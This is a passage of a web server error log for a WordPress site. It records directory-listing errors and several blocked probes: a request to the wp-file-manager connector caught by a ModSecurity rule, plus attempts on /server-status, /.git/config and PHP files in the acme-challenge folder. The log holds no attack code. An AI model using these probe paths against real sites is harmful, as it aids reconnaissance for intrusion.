(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:10.177767 2024] [autoindex:error] [pid 12849:tid 140676469577472] [client 45.8.19.69:44582] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:14.101576 2024] [autoindex:error] [pid 10814:tid 140676394043136] [client 45.8.19.69:44594] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/12/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:14.185087 2024] [autoindex:error] [pid 10813:tid 140676553504512] [client 45.8.19.69:44596] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:22.246188 2024] [autoindex:error] [pid 11448:tid 140676452792064] [client 45.8.19.69:44620] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:22.332529 2024] [autoindex:error] [pid 12843:tid 140676654589696] [client 45.8.19.69:44622] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:26.629261 2024] [autoindex:error] [pid 10814:tid 140676385650432] [client 45.8.19.69:44640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/utils/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:26.720274 2024] [autoindex:error] [pid 11448:tid 140676427613952] [client 45.8.19.69:44642] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/block/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:26.808520 2024] [autoindex:error] [pid 12849:tid 140676629411584] [client 45.8.19.69:44644] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:30.757645 2024] [autoindex:error] [pid 10814:tid 140676545111808] [client 45.8.19.69:44656] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwenty/template-parts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:32.478781 2024] [autoindex:error] [pid 12849:tid 140676654589696] [client 45.8.19.69:44668] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:40.594322 2024] [autoindex:error] [pid 10814:tid 140676637804288] [client 45.8.19.69:44696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/code/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:43.477737 2024] [autoindex:error] [pid 10814:tid 140676528326400] [client 45.8.19.69:44708] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/quote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:52.761036 2024] [autoindex:error] [pid 12843:tid 140676511540992] [client 45.8.19.69:44738] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/legacy-widget/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:00.412923 2024] [autoindex:error] [pid 12805:tid 140676461184768] [client 45.8.19.69:44760] AH01276: Cannot serve directory /home/investig/public_html/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:01.199732 2024] [autoindex:error] [pid 10814:tid 140676646196992] [client 45.8.19.69:44764] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:03.733691 2024] [autoindex:error] [pid 12849:tid 140676461184768] [client 45.8.19.69:44772] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core32/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:04.542262 2024] [autoindex:error] [pid 10815:tid 140676410828544] [client 45.8.19.69:44776] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/thickbox/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:04.628143 2024] [autoindex:error] [pid 10815:tid 140676553504512] [client 45.8.19.69:44778] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:05.484716 2024] [autoindex:error] [pid 10813:tid 140676394043136] [client 45.8.19.69:44782] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:05.573556 2024] [autoindex:error] [pid 10814:tid 140676536719104] [client 45.8.19.69:44784] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/XML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:05.657553 2024] [autoindex:error] [pid 10815:tid 140676486362880] [client 45.8.19.69:44786] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:06.604008 2024] [autoindex:error] [pid 10814:tid 140676486362880] [client 45.8.19.69:44790] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:06.692748 2024] [autoindex:error] [pid 10814:tid 140676402435840] [client 45.8.19.69:44792] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentysixteen/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:08.316941 2024] [autoindex:error] [pid 11448:tid 140676477970176] [client 45.8.19.69:44798] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/parts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:09.908861 2024] [autoindex:error] [pid 11448:tid 140676646196992] [client 45.8.19.69:44804] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/group/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:12.168685 2024] [autoindex:error] [pid 10814:tid 140676385650432] [client 45.8.19.69:44812] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-tagline/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:17.166705 2024] [autoindex:error] [pid 12849:tid 140676553504512] [client 45.8.19.69:44832] AH01276: Cannot serve directory /home/investig/public_html/wp-content/plugins/wpforms-lite/src/Forms/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:17.256496 2024] [autoindex:error] [pid 12805:tid 140676444399360] [client 45.8.19.69:44834] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-excerpt/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:17.340725 2024] [autoindex:error] [pid 12805:tid 140676427613952] [client 45.8.19.69:44836] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:17.425719 2024] [autoindex:error] [pid 12805:tid 140676419221248] [client 45.8.19.69:44838] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:19.224511 2024] [autoindex:error] [pid 12843:tid 140676486362880] [client 45.8.19.69:44844] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/gallery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:19.358991 2024] [:error] [pid 12843:tid 140676452792064] [client 45.8.19.69:44846] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentysixteen/index.php:17 [Tue Mar 19 12:19:19.359054 2024] [:error] [pid 12843:tid 140676452792064] [client 45.8.19.69:44846] Stack trace: [Tue Mar 19 12:19:19.359066 2024] [:error] [pid 12843:tid 140676452792064] [client 45.8.19.69:44846] #0 {main} [Tue Mar 19 12:19:19.359160 2024] [:error] [pid 12843:tid 140676452792064] [client 45.8.19.69:44846] thrown in /home/investig/public_html/wp-content/themes/twentysixteen/index.php on line 17 [Tue Mar 19 12:19:19.448352 2024] [autoindex:error] [pid 12843:tid 140676427613952] [client 45.8.19.69:44848] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/lists/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:20.341052 2024] [autoindex:error] [pid 10814:tid 140676477970176] [client 45.8.19.69:44852] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/assets/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:20.428198 2024] [autoindex:error] [pid 11448:tid 140676419221248] [client 45.8.19.69:44854] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:23.677293 2024] [autoindex:error] [pid 12849:tid 140676637804288] [client 45.8.19.69:44864] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/inc/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:23.761058 2024] [autoindex:error] [pid 12843:tid 140676419221248] [client 45.8.19.69:44866] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/rss/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:23.846283 2024] [autoindex:error] [pid 10814:tid 140676536719104] [client 45.8.19.69:44868] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentyseventeen/assets/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:26.798568 2024] [autoindex:error] [pid 11448:tid 140676394043136] [client 45.8.19.69:44882] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/wpemoji/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:29.177757 2024] [autoindex:error] [pid 12849:tid 140676545111808] [client 45.8.19.69:44890] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/directionality/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:29.263891 2024] [autoindex:error] [pid 12843:tid 140676646196992] [client 45.8.19.69:44892] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:30.818697 2024] [autoindex:error] [pid 11448:tid 140676444399360] [client 45.8.19.69:44898] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentyone/assets/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:30.913576 2024] [autoindex:error] [pid 10815:tid 140676511540992] [client 45.8.19.69:44900] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:19:39.764886 2024] [autoindex:error] [pid 11448:tid 140676553504512] [client 45.8.19.69:44940] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 21:28:59.877783 2024] [:error] [pid 12843:tid 140676536719104] [client 164.90.146.144:54836] [client 164.90.146.144] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "ZfpJ67HstH37mpbvZj5q9wAAAYY"] [Wed Mar 20 08:32:42.122921 2024] [ssl:warn] [pid 1015:tid 139834346420096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 20 08:32:50.656511 2024] [ssl:warn] [pid 2034:tid 139834346420096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 20 23:47:18.157946 2024] [:error] [pid 2061:tid 139834068825856] [client 182.75.21.118:44142] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Wed Mar 20 23:47:19.293022 2024] [:error] [pid 2219:tid 139833976506112] [client 182.75.21.118:44146] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Wed Mar 20 23:47:21.176990 2024] [:error] [pid 2061:tid 139834043647744] [client 182.75.21.118:44148] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xl2023.php [Wed Mar 20 23:47:22.759080 2024] [:error] [pid 2061:tid 139833900971776] [client 182.75.21.118:44150] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xl2023.php [Wed Mar 20 23:47:55.123149 2024] [:error] [pid 2219:tid 139833934542592] [client 182.75.21.118:44174] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Thu Mar 21 03:09:25.602562 2024] [ssl:warn] [pid 23075:tid 139953696466816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 21 03:09:37.822880 2024] [ssl:warn] [pid 23079:tid 139953696466816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 21 03:09:38.359649 2024] [ssl:warn] [pid 23079:tid 139953696466816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 21 03:09:40.850436 2024] [ssl:warn] [pid 23079:tid 139953696466816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 21 03:09:43.153682 2024] [ssl:warn] [pid 23495:tid 140199677015936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 21 03:09:55.333800 2024] [ssl:warn] [pid 23501:tid 140199677015936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 21 08:27:07.611681 2024] [authz_core:error] [pid 24254:tid 140199359125248] [client 167.71.81.114:60618] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/21 08:27:10 [error] 23379#23379: *22956 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Mar 21 08:46:01.277888 2024] [authz_core:error] [pid 23523:tid 140199333947136] [client 23.239.21.238:60858] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/21 08:46:04 [error] 23378#23378: *23140 access forbidden by rule, client: 23.239.21.238, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Mar 21 08:46:28.465319 2024] [authz_core:error] [pid 23523:tid 140199317161728] [client 159.89.17.243:60932] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/21 08:46:31 [error] 23379#23379: *23207 access forbidden by rule, client: 159.89.17.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Mar 21 11:37:51.236802 2024] [authz_core:error] [pid 28167:tid 140199485875968] [client 209.38.248.17:36468] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/21 11:38:01 [error] 23379#23379: *25269 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Mar 22 03:28:28.767099 2024] [ssl:warn] [pid 4493:tid 140606636124032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 22 03:28:40.969632 2024] [ssl:warn] [pid 4495:tid 140606636124032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 22 03:28:41.362021 2024] [ssl:warn] [pid 4495:tid 140606636124032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 22 03:28:44.211665 2024] [ssl:warn] [pid 4495:tid 140606636124032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 22 03:28:46.472913 2024] [ssl:warn] [pid 4939:tid 140327173085056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 22 03:28:58.679236 2024] [ssl:warn] [pid 4941:tid 140327173085056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 22 13:03:16.532790 2024] [autoindex:error] [pid 4962:tid 140326790432512] [client 38.103.167.2:44856] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:03:55.878087 2024] [autoindex:error] [pid 4963:tid 140326815610624] [client 165.22.220.140:45000] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:04:14.243165 2024] 